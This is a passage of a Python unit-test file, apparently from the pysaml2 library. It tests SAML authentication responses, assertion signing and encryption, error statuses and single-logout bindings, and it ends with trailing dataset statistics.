assert assertion.version == "2.0"
assert assertion.issuer.text == "urn:mace:example.com:saml:roland:idp"
#
assert assertion.attribute_statement
attribute_statement = assertion.attribute_statement
assert len(attribute_statement.attribute) == 2
attr0 = attribute_statement.attribute[0]
attr1 = attribute_statement.attribute[1]
if attr0.attribute_value[0].text == "Derek":
assert attr0.friendly_name == "givenName"
assert attr1.friendly_name == "sn"
assert attr1.attribute_value[0].text == "Jeter"
else:
assert attr1.friendly_name == "givenName"
assert attr1.attribute_value[0].text == "Derek"
assert attr0.friendly_name == "sn"
assert attr0.attribute_value[0].text == "Jeter"
#
subject = assertion.subject
assert _eq(subject.keyswv(), ["text", "name_id"])
assert subject.text == "_aaa"
assert subject.name_id.format == saml.NAMEID_FORMAT_TRANSIENT
def test_response(self):
response = response_factory(
in_response_to="_012345",
destination="https:#www.example.com",
status=s_utils.success_status_factory(),
assertion=s_utils.assertion_factory(
subject=factory(saml.Subject, text="_aaa",
name_id=saml.NAMEID_FORMAT_TRANSIENT),
attribute_statement=do_attribute_statement(
{
("", "", "sn"): ("Jeter", ""),
("", "", "givenName"): ("Derek", ""),
}
),
issuer=self.server._issuer(),
),
issuer=self.server._issuer(),
)
print(response.keyswv())
assert _eq(response.keyswv(), ['destination', 'assertion', 'status',
'in_response_to', 'issue_instant',
'version', 'issuer', 'id'])
assert response.version == "2.0"
assert response.issuer.text == "urn:mace:example.com:saml:roland:idp"
assert response.destination == "https:#www.example.com"
assert response.in_response_to == "_012345"
#
status = response.status
print(status)
assert status.status_code.value == samlp.STATUS_SUCCESS
def test_parse_faulty_request(self):
req_id, authn_request = self.client.create_authn_request(
destination="http://www.example.com", id="id1")
# should raise an error because faulty spentityid
binding = BINDING_HTTP_REDIRECT
htargs = self.client.apply_binding(
binding, "%s" % authn_request, "http://www.example.com", "abcd")
_dict = parse_qs(htargs["headers"][0][1].split('?')[1])
print(_dict)
with raises(OtherError):
self.server.parse_authn_request(_dict["SAMLRequest"][0], binding)
def test_parse_faulty_request_to_err_status(self):
req_id, authn_request = self.client.create_authn_request(
destination="http://www.example.com")
binding = BINDING_HTTP_REDIRECT
htargs = self.client.apply_binding(binding, "%s" % authn_request,
"http://www.example.com", "abcd")
_dict = parse_qs(htargs["headers"][0][1].split('?')[1])
print(_dict)
try:
self.server.parse_authn_request(_dict["SAMLRequest"][0], binding)
status = None
except OtherError as oe:
print(oe.args)
status = s_utils.error_status_factory(oe)
assert status
print(status)
assert _eq(status.keyswv(), ["status_code", "status_message"])
assert status.status_message.text == 'Not destined for me!'
status_code = status.status_code
assert _eq(status_code.keyswv(), ["status_code", "value"])
assert status_code.value == samlp.STATUS_RESPONDER
assert status_code.status_code.value == samlp.STATUS_UNKNOWN_PRINCIPAL
def test_parse_ok_request(self):
req_id, authn_request = self.client.create_authn_request(
message_id="id1",
destination="http://localhost:8088/sso",
nameid_format=saml.NAMEID_FORMAT_TRANSIENT,
)
print(authn_request)
binding = BINDING_HTTP_REDIRECT
htargs = self.client.apply_binding(binding, "%s" % authn_request,
"http://www.example.com", "abcd")
_dict = parse_qs(htargs["headers"][0][1].split('?')[1])
print(_dict)
req = self.server.parse_authn_request(_dict["SAMLRequest"][0], binding)
# returns a dictionary
print(req)
resp_args = self.server.response_args(req.message, [BINDING_HTTP_POST])
assert resp_args["destination"] == "http://lingon.catalogix.se:8087/"
assert resp_args["in_response_to"] == "id1"
name_id_policy = resp_args["name_id_policy"]
assert _eq(name_id_policy.keyswv(), ["format"])
assert name_id_policy.format == saml.NAMEID_FORMAT_TRANSIENT
assert resp_args[
"sp_entity_id"] == "urn:mace:example.com:saml:roland:sp"
def test_sso_response_with_identity(self):
name_id = self.server.ident.transient_nameid(
"https://example.com/sp", "id12")
resp = self.server.create_authn_response(
{
"eduPersonEntitlement": "Short stop",
"sn": "Jeter",
"givenName": "Derek",
"mail": "derek.jeter@nyy.mlb.com",
"title": "The man"
},
"id12", # in_response_to
"http://localhost:8087/", # destination
"https://example.com/sp", # sp_entity_id
name_id=name_id,
authn=AUTHN
)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'assertion',
'in_response_to', 'issue_instant',
'version', 'id', 'issuer'])
assert resp.destination == "http://localhost:8087/"
assert resp.in_response_to == "id12"
assert resp.status
assert resp.status.status_code.value == samlp.STATUS_SUCCESS
assert resp.assertion
assertion = resp.assertion
print(assertion)
assert assertion.authn_statement
assert assertion.conditions
assert assertion.attribute_statement
attribute_statement = assertion.attribute_statement
print(attribute_statement)
assert len(attribute_statement[0].attribute) == 4
# Pick out one attribute
attr = None
for attr in attribute_statement[0].attribute:
if attr.friendly_name == "givenName":
break
assert len(attr.attribute_value) == 1
assert attr.name == "urn:mace:dir:attribute-def:givenName"
assert attr.name_format == "urn:oasis:names:tc:SAML:2.0:attrname-format:basic"
value = attr.attribute_value[0]
assert value.text.strip() == "Derek"
assert value.get_type() == "xs:string"
assert assertion.subject
assert assertion.subject.name_id
assert assertion.subject.subject_confirmation
confirmation = assertion.subject.subject_confirmation[0]
print(confirmation.keyswv())
print(confirmation.subject_confirmation_data)
assert confirmation.subject_confirmation_data.in_response_to == "id12"
def test_sso_response_without_identity(self):
resp = self.server.create_authn_response(
{},
"id12", # in_response_to
"http://localhost:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
userid="USER1",
authn=AUTHN,
release_policy=Policy(),
best_effort=True
)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'in_response_to',
'issue_instant', 'version', 'id', 'issuer',
'assertion'])
assert resp.destination == "http://localhost:8087/"
assert resp.in_response_to == "id12"
assert resp.status
assert resp.status.status_code.value == samlp.STATUS_SUCCESS
assert resp.issuer.text == "urn:mace:example.com:saml:roland:idp"
assert not resp.assertion.attribute_statement
def test_sso_response_specific_instant(self):
_authn = AUTHN.copy()
_authn["authn_instant"] = 1234567890
resp = self.server.create_authn_response(
{},
"id12", # in_response_to
"http://localhost:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
userid="USER1",
authn=_authn,
best_effort=True
)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'in_response_to',
'issue_instant', 'version', 'id', 'issuer',
'assertion'])
authn_statement = resp.assertion.authn_statement[0]
assert authn_statement.authn_instant == '2009-02-13T23:31:30Z'
def test_sso_failure_response(self):
exc = s_utils.MissingValue("eduPersonAffiliation missing")
resp = self.server.create_error_response(
"id12", "http://localhost:8087/", exc)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'in_response_to',
'issue_instant', 'version', 'id', 'issuer'])
assert resp.destination == "http://localhost:8087/"
assert resp.in_response_to == "id12"
assert resp.status
print(resp.status)
assert resp.status.status_code.value == samlp.STATUS_RESPONDER
assert resp.status.status_code.status_code.value == \
samlp.STATUS_REQUEST_UNSUPPORTED
assert resp.status.status_message.text == \
"eduPersonAffiliation missing"
assert resp.issuer.text == "urn:mace:example.com:saml:roland:idp"
assert not resp.assertion
def test_authn_response_0(self):
conf = config.SPConfig()
conf.load_file("server_conf")
self.client = client.Saml2Client(conf)
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["derek@nyy.mlb.com"], "title": "The man"}
npolicy = samlp.NameIDPolicy(format=saml.NAMEID_FORMAT_TRANSIENT,
allow_create="true")
resp_str = "%s" % self.server.create_authn_response(
ava, "id1", "http://local:8087/",
"urn:mace:example.com:saml:roland:sp", npolicy,
"foba0001@example.com", authn=AUTHN)
response = samlp.response_from_string(resp_str)
print(response.keyswv())
assert _eq(response.keyswv(), ['status', 'destination', 'assertion',
'in_response_to', 'issue_instant',
'version', 'issuer', 'id'])
print(response.assertion[0].keyswv())
assert len(response.assertion) == 1
assert _eq(response.assertion[0].keyswv(), ['attribute_statement',
'issue_instant', 'version',
'subject', 'conditions',
'id', 'issuer',
'authn_statement'])
assertion = response.assertion[0]
assert len(assertion.attribute_statement) == 1
astate = assertion.attribute_statement[0]
print(astate)
assert len(astate.attribute) == 4
def test_signed_response(self):
name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id12")
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["derek@nyy.mlb.com"], "title": "The man"}
signed_resp = self.server.create_authn_response(
ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=name_id,
sign_assertion=True
)
print(signed_resp)
assert signed_resp
sresponse = response_from_string(signed_resp)
# It's the assertions that are signed not the response per se
assert len(sresponse.assertion) == 1
assertion = sresponse.assertion[0]
# Since the reponse is created dynamically I don't know the signature
# value. Just that there should be one
assert assertion.signature.signature_value.text != ""
def test_signed_response_1(self):
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=sresponse.assertion[0].id)
assert valid
self.verify_assertion(sresponse.assertion)
def test_signed_response_2(self):
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=False,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
assert sresponse.assertion[0].signature == None
def test_signed_response_3(self):
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=True,
)
sresponse = response_from_string(signed_resp)
assert sresponse.signature == None
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=sresponse.assertion[0].id)
assert valid
self.verify_assertion(sresponse.assertion)
def test_encrypted_signed_response_1(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(
signed_resp, self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id,
)
assert valid
valid = self.server.sec.verify_signature(
signed_resp, self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=sresponse.assertion[0].id,
)
assert valid
key_fd = make_temp(cert_key_str, decode=False)
decr_text = self.server.sec.decrypt(signed_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
assert resp.assertion[0].advice.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(
resp.assertion[0].advice.encrypted_assertion[0].extension_elements,
[saml, samlp])
self.verify_assertion(assertion)
#PEFIM never signs assertions.
assert assertion[0].signature is None
#valid = self.server.sec.verify_signature(decr_text,
# self.server.config.cert_file,
# node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
# node_id=assertion[0].id)
assert valid
def test_encrypted_signed_response_2(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
decr_text_old = copy.deepcopy("%s" % signed_resp)
with raises(DecryptError):
decr_text = self.server.sec.decrypt(
signed_resp,
self.client.config.encryption_keypairs[0]["key_file"],
)
decr_text = self.server.sec.decrypt(signed_resp, self.client.config.encryption_keypairs[1]["key_file"])
assert decr_text != decr_text_old
resp = samlp.response_from_string(decr_text)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
assert resp.assertion[0].signature == None
self.verify_assertion(resp.assertion)
def test_encrypted_signed_response_3(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=False,
encrypt_cert_assertion=cert_str,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
key_fd = make_temp(cert_key_str, decode=False)
decr_text = self.server.sec.decrypt(signed_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
valid = self.server.sec.verify_signature(decr_text,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=resp.assertion[0].id)
assert valid
self.verify_assertion(resp.assertion)
assert 'xmlns:encas' not in decr_text
def test_encrypted_signed_response_4(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
decr_text = self.server.sec.decrypt(signed_resp, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
valid = self.server.sec.verify_signature(decr_text,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=resp.assertion[0].id)
assert valid
key_fd = make_temp(cert_key_str, decode=False)
decr_text = self.server.sec.decrypt(decr_text, key_fd.name)
resp = samlp.response_from_string(decr_text)
assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
assertion = \
extension_elements_to_elements(assertion[0].advice.encrypted_assertion[0].extension_elements,[saml, samlp])
self.verify_assertion(assertion)
#PEFIM never signs assertion in advice
assert assertion[0].signature is None
#valid = self.server.sec.verify_signature(decr_text,
# self.server.config.cert_file,
# node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
# node_id=assertion[0].id)
assert valid
def test_encrypted_response_1(self):
cert_str_advice, cert_key_str_advice = generate_cert()
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str_advice,
)
_resp = "%s" % _resp
sresponse = response_from_string(_resp)
assert sresponse.signature is None
key_fd = make_temp(cert_key_str_advice, decode=False)
decr_text = self.server.sec.decrypt(_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
self.verify_advice_assertion(resp, decr_text)
def test_encrypted_response_2(self):
cert_str_advice, cert_key_str_advice = generate_cert()
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str_advice,
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text_1 = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
key_fd = make_temp(cert_key_str_advice, decode=False)
decr_text_2 = self.server.sec.decrypt(decr_text_1, key_fd.name)
resp = samlp.response_from_string(decr_text_2)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_advice_assertion(resp, decr_text_2)
def test_encrypted_response_3(self):
cert_str_assertion, cert_key_str_assertion = generate_cert()
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
encrypt_cert_assertion=cert_str_assertion
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
key_fd = make_temp(cert_key_str_assertion, decode=False)
decr_text = self.server.sec.decrypt(_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
assert resp.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_encrypted_assertion(assertion, decr_text)
def test_encrypted_response_4(self):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text)
assert resp.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_encrypted_assertion(assertion, decr_text)
def test_encrypted_response_5(self):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True
)
_resp = "%s" % _resp
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text)
self.verify_advice_assertion(resp, decr_text)
def test_encrypted_response_6(self):
_server = Server("idp_conf_verify_cert")
cert_str_advice, cert_key_str_advice = generate_cert()
cert_str_assertion, cert_key_str_assertion = generate_cert()
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str_advice,
encrypt_cert_assertion=cert_str_assertion
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
key_fd1 = make_temp(cert_key_str_assertion, decode=False)
decr_text_1 = _server.sec.decrypt(_resp, key_fd1.name)
key_fd2 = make_temp(cert_key_str_advice, decode=False)
decr_text_2 = _server.sec.decrypt(decr_text_1, key_fd2.name)
resp = samlp.response_from_string(decr_text_2)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_advice_assertion(resp, decr_text_2)
def test_encrypted_response_7(self):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text_1 = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
decr_text_2 = self.server.sec.decrypt(decr_text_1, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text_2)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_advice_assertion(resp, decr_text_2)
def test_encrypted_response_8(self):
try:
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
encrypt_cert_assertion="whatever"
)
assert False, "Must throw an exception"
except EncryptError as ex:
pass
except Exception as ex:
assert False, "Wrong exception!"
try:
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
)
assert False, "Must throw an exception"
except EncryptError as ex:
pass
except Exception as ex:
assert False, "Wrong exception!"
try:
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
encrypt_cert_assertion="whatever"
)
assert False, "Must throw an exception"
except EncryptError as ex:
pass
except Exception as ex:
assert False, "Wrong exception!"
_server = Server("idp_conf_verify_cert")
try:
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
encrypt_cert_assertion="whatever"
)
assert False, "Must throw an exception"
except CertificateError as ex:
pass
except Exception as ex:
assert False, "Wrong exception!"
try:
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
)
assert False, "Must throw an exception"
except CertificateError as ex:
pass
except Exception as ex:
assert False, "Wrong exception!"
try:
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
encrypt_cert_assertion="whatever"
)
assert False, "Must throw an exception"
except CertificateError as ex:
pass
except Exception as ex:
assert False, "Wrong exception!"
def test_encrypted_response_9(self):
_server = Server("idp_conf_sp_no_encrypt")
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
)
self.verify_assertion(_resp.assertion.advice.assertion)
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True
)
self.verify_assertion(_resp.assertion.advice.assertion)
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
)
self.verify_assertion([_resp.assertion])
def test_slo_http_post(self):
soon = time_util.in_a_while(days=1)
sinfo = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": soon,
"user": {
"givenName": "Leo",
"sn": "Laport",
}
}
self.client.users.add_information_about_person(sinfo)
req_id, logout_request = self.client.create_logout_request(
destination="http://localhost:8088/slop", name_id=nid,
issuer_entity_id="urn:mace:example.com:saml:roland:idp",
reason="I'm tired of this")
intermed = base64.b64encode(str(logout_request).encode('utf-8'))
#saml_soap = make_soap_enveloped_saml_thingy(logout_request)
request = self.server.parse_logout_request(intermed, BINDING_HTTP_POST)
assert request
def test_slo_soap(self):
soon = time_util.in_a_while(days=1)
sinfo = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": soon,
"user": {
"givenName": "Leo",
"sn": "Laport",
}
}
sp = client.Saml2Client(config_file="server_conf")
sp.users.add_information_about_person(sinfo)
req_id, logout_request = sp.create_logout_request(
name_id=nid, destination="http://localhost:8088/slo",
issuer_entity_id="urn:mace:example.com:saml:roland:idp",
reason="I'm tired of this")
#_ = s_utils.deflate_and_base64_encode("%s" % (logout_request,))
saml_soap = make_soap_enveloped_saml_thingy(logout_request)
self.server.ident.close()
with closing(Server("idp_soap_conf")) as idp:
request = idp.parse_logout_request(saml_soap)
idp.ident.close()
assert request
# ------------------------------------------------------------------------
IDENTITY = {"eduPersonAffiliation": ["staff", "member"],
"sn": ["Jeter"], "givenName": ["Derek"],
"mail": ["foo@gmail.com"], "title": "The man"}
class TestServer2():
def setup_class(self):
self.server = Server("restrictive_idp_conf")
def teardown_class(self):
self.server.close()
def test_do_attribute_reponse(self):
aa_policy = self.server.config.getattr("policy", "idp")
print(aa_policy.__dict__)
response = self.server.create_attribute_response(
IDENTITY.copy(), "aaa", "http://example.com/sp/",
"http://www.example.com/roland/sp")
assert response is not None
assert response.destination == "http://example.com/sp/"
assert response.in_response_to == "aaa"
assert response.version == "2.0"
assert response.issuer.text == "urn:mace:example.com:saml:roland:idpr"
assert response.status.status_code.value == samlp.STATUS_SUCCESS
assert response.assertion
assertion = response.assertion
assert assertion.version == "2.0"
subject = assertion.subject
#assert subject.name_id.format == saml.NAMEID_FORMAT_TRANSIENT
assert subject.subject_confirmation
subject_conf = subject.subject_confirmation[0]
assert subject_conf.subject_confirmation_data.in_response_to == "aaa"
def _logout_request(conf_file):
conf = config.SPConfig()
conf.load_file(conf_file)
sp = client.Saml2Client(conf)
soon = time_util.in_a_while(days=1)
sinfo = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": soon,
"user": {
"givenName": "Leo",
"sn": "Laport",
}
}
sp.users.add_information_about_person(sinfo)
return sp.create_logout_request(
name_id=nid,
destination="http://localhost:8088/slo",
issuer_entity_id="urn:mace:example.com:saml:roland:idp",
reason="I'm tired of this")
class TestServerLogout():
def test_1(self):
with closing(Server("idp_slo_redirect_conf")) as server:
req_id, request = _logout_request("sp_slo_redirect_conf")
print(request)
bindings = [BINDING_HTTP_REDIRECT]
response = server.create_logout_response(request, bindings)
binding, destination = server.pick_binding(
"single_logout_service", bindings, "spsso", request
)
http_args = server.apply_binding(
binding, "%s" % response, destination, "relay_state", response=True
)
assert len(http_args) == 5
assert http_args["headers"][0][0] == "Location"
assert http_args["data"] == []
assert http_args["status"] == 303
assert http_args['url'] == 'http://lingon.catalogix.se:8087/sloresp'
def test_2(self):
with closing(Server("idp_slo_redirect_conf")) as server:
req_id, request = _logout_request("sp_slo_redirect_conf")
print(request)
bindings = [BINDING_HTTP_POST]
response = server.create_logout_response(request, bindings)
binding, destination = server.pick_binding(
"single_logout_service", bindings, "spsso", request
)
http_args = server.apply_binding(
binding, "%s" % response, destination, "relay_state", response=True
)
assert len(http_args) == 5
assert len(http_args["data"]) > 0
assert http_args["method"] == "POST"
assert http_args['url'] == 'http://lingon.catalogix.se:8087/slo'
assert http_args['status'] == 200
if __name__ == "__main__":
ts = TestServer1()
ts.setup_class()
ts.test_encrypted_signed_response_1()
| 38.576271
| 124
| 0.588456
| 9,941
| 91,040
| 5.106931
| 0.039936
| 0.032304
| 0.019382
| 0.026454
| 0.950264
| 0.94404
| 0.941499
| 0.939115
| 0.93748
| 0.933501
| 0
| 0.01517
| 0.308524
| 91,040
| 2,359
| 125
| 38.592624
| 0.791285
| 0.049418
| 0
| 0.874866
| 0
| 0.001074
| 0.13229
| 0.051857
| 0
| 0
| 0
| 0
| 0.296992
| 1
| 0.042965
| false
| 0.004296
| 0.01826
| 0.000537
| 0.066058
| 0.025242
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
